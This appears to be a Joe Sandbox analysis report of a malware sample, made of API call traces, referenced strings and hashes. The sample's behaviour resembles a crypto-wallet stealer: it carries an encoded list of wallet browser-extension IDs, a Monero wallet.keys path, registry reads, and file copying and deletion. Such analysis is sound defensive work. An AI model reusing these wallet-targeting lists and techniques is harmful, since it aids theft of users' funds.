                                      • Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB
                                    • lstrcat.KERNEL32(?,00000000), ref: 001942E1
                                    • lstrcat.KERNEL32(?,?), ref: 00194300
                                    • lstrcat.KERNEL32(?,?), ref: 00194314
                                    • lstrcat.KERNEL32(?,0139B130), ref: 00194327
                                    • lstrcat.KERNEL32(?,?), ref: 0019433B
                                    • lstrcat.KERNEL32(?,013AD4F8), ref: 0019434F
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 00198830: GetFileAttributesA.KERNEL32(00000000,?,00181B94,?,?,001A554C,?,?,001A0E07), ref: 0019883F
                                      • Part of subcall function 00194050: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00194060
                                      • Part of subcall function 00194050: RtlAllocateHeap.NTDLL(00000000), ref: 00194067
                                      • Part of subcall function 00194050: wsprintfA.USER32 ref: 00194086
                                      • Part of subcall function 00194050: FindFirstFileA.KERNEL32(?,?), ref: 0019409D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 6ffc5bbd0d5484ef100492dfd517c73b5723f26b63811d59930112af015eb403
                                    • Instruction ID: 8a7ac91a9338681fd9d3baad84d811cabee560a5f869b580bb2e722f5fbe6588
                                    • Opcode Fuzzy Hash: 6ffc5bbd0d5484ef100492dfd517c73b5723f26b63811d59930112af015eb403
                                    • Instruction Fuzzy Hash: C33193B2910218A7CF14FBA0DC85EED773CAF69304F808589B60697041EFB49788CFA4
                                    APIs
                                    • OpenEventA.KERNEL32(rcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWx,00000000,00000000,00000000,?,013A8A60,?,001A10DC,?,00000000,?,001A10E0,?,00000000,001A0ADA), ref: 0019656A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00196588
                                    • CloseHandle.KERNEL32(00000000), ref: 00196599
                                    • Sleep.KERNEL32(00001770), ref: 001965A4
                                    • CloseHandle.KERNEL32(?,00000000,?,013A8A60,?,001A10DC,?,00000000,?,001A10E0,?,00000000,001A0ADA), ref: 001965BA
                                    • ExitProcess.KERNEL32 ref: 001965C2
                                    Strings
                                    • rcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWx, xrefs: 00196565
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID: rcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWx
                                    • API String ID: 941982115-2363891162
                                    • Opcode ID: d9ef9255b04eff3580fc667a6968dc4ccd57b14a57320ef7f87ba49ec8fe9912
                                    • Instruction ID: c0eaf75bb5c1343f53f9c71095ed499a4033290f18c17d4074b07d664453f058
                                    • Opcode Fuzzy Hash: d9ef9255b04eff3580fc667a6968dc4ccd57b14a57320ef7f87ba49ec8fe9912
                                    • Instruction Fuzzy Hash: B2F05870900205EFFF11ABA0DC0AB7E7778AF18781F528414B916A5095CBF065048BB5
                                    APIs
                                    • GetSystemInfo.KERNEL32(?), ref: 6C68C947
                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C68C969
                                    • GetSystemInfo.KERNEL32(?), ref: 6C68C9A9
                                    • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C68C9C8
                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C68C9E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocInfoSystem$Free
                                    • String ID:
                                    • API String ID: 4191843772-0
                                    • Opcode ID: cb57595f118f1758c93bff4230bd61748a5b03148aa976642d3247b6165ee782
                                    • Instruction ID: 2fd10167984c5f841c72a342b0593c1d251beabfb9684447e481b5e01146318c
                                    • Opcode Fuzzy Hash: cb57595f118f1758c93bff4230bd61748a5b03148aa976642d3247b6165ee782
                                    • Instruction Fuzzy Hash: 6521D7327422147BDF04AE65ECC4BAE73BAAB86744F50025AFA17A7B40DB605C0487BD
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001978D7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001978DE
                                    • RegOpenKeyExA.KERNEL32(80000002,0139BD58,00000000,00020119,?), ref: 001978FE
                                    • RegQueryValueExA.KERNEL32(?,013AD5B8,00000000,00000000,000000FF,000000FF), ref: 0019791F
                                    • RegCloseKey.ADVAPI32(?), ref: 00197932
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 73d7511ed323d2ff519420b9b8d3c7cba89a8e3b8d18eef984bb7b2a2e5e821a
                                    • Instruction ID: ddb374e65f8357f29e2689eb585133f89e12d225bb6ae5eab78036b6822202ba
                                    • Opcode Fuzzy Hash: 73d7511ed323d2ff519420b9b8d3c7cba89a8e3b8d18eef984bb7b2a2e5e821a
                                    • Instruction Fuzzy Hash: 83119EB1A54205EFDB05CF94DD4AFBBBB7CFB49B20F104219F60AA7280D77458008BA0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001812B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001812BB
                                    • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 001812D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001812F5
                                    • RegCloseKey.ADVAPI32(?), ref: 001812FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 9e7254f8e458440097e627053b5aa98ce0172146d21a5c925f869c8863759e1b
                                    • Instruction ID: 446f0f7d51feb9fa21cc998da38a011015958ee6cc9ad9eefc0805b846ec5ec9
                                    • Opcode Fuzzy Hash: 9e7254f8e458440097e627053b5aa98ce0172146d21a5c925f869c8863759e1b
                                    • Instruction Fuzzy Hash: 1E01E1B9A40208BFDB14DFE4DC49FAEB77DEB48701F108158FA0597280DB709A05CB50
                                    APIs
                                    • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00196B7E
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    • memset.MSVCRT ref: 00196C0A
                                    Strings
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00196C2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpymemset
                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 4047604823-4138519520
                                    • Opcode ID: 6d3f2ad1270551ca50f4396f92003adaed98414a9ea045486ec7c8c676528925
                                    • Instruction ID: 6ab35cf6224f0918d994166ff2f1ba9782f9de206fcbc2c8638e04e378d75283
                                    • Opcode Fuzzy Hash: 6d3f2ad1270551ca50f4396f92003adaed98414a9ea045486ec7c8c676528925
                                    • Instruction Fuzzy Hash: AD5183B0D002189FDF24EB90DC95BEEB3B4AF54304F9441A9E11977181EB746E88CFA5
                                    APIs
                                    • GetEnvironmentVariableA.KERNEL32(013A8B20,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0018A00D
                                    • LoadLibraryA.KERNEL32(013AD5D8), ref: 0018A096
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A1F0: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DC6), ref: 0019A1FB
                                      • Part of subcall function 0019A1F0: lstrcpy.KERNEL32(001A0DC6,00000000), ref: 0019A255
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • SetEnvironmentVariableA.KERNEL32(013A8B20,00000000,00000000,?,001A1290,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,001A0AE6), ref: 0018A082
                                    Strings
                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0018A002, 0018A016, 0018A02C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                    • API String ID: 2929475105-4027016359
                                    • Opcode ID: f189f90bc58a7cc39c6bfa377f5ca1e124cb117a7eb1ecfae04a4cc63aba2933
                                    • Instruction ID: 7895339a6d2cfcd0773d9b01bf3120145357add971f073fdb7f1a43592dd5ce8
                                    • Opcode Fuzzy Hash: f189f90bc58a7cc39c6bfa377f5ca1e124cb117a7eb1ecfae04a4cc63aba2933
                                    • Instruction Fuzzy Hash: 80416371924104AFCB16EBB4EC56FAE77BDBF1A302F545029F405A32A0EB705A44CFA1
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 00198600: GetSystemTime.KERNEL32(001A0E02,013A9C08,001A059E,?,?,001813F9,?,0000001A,001A0E02,00000000,?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 00198626
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018A231
                                    • lstrlen.KERNEL32(00000000), ref: 0018A5EA
                                      • Part of subcall function 00189E60: LocalAlloc.KERNEL32(00000040,?), ref: 00189EFE
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0018A32D
                                    • DeleteFileA.KERNEL32(00000000), ref: 0018A671
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
